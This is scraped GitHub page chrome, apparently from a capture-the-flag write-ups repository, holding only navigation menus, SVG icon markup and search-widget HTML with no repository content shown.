<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="426049755" data-scoped-search-url="/palanioffcl/CTF-Writeups/search" data-owner-scoped-search-url="/users/palanioffcl/search" data-unscoped-search-url="/search" data-turbo="false" action="/palanioffcl/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="mOb1qhkdg7TA435NhVNeVeHTdL5aoXAbvmIV/bHlZgHn8/JD6Xp8hiW6rRGytp+lGYO/P8vacXuLgT+Fvpa5ZA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
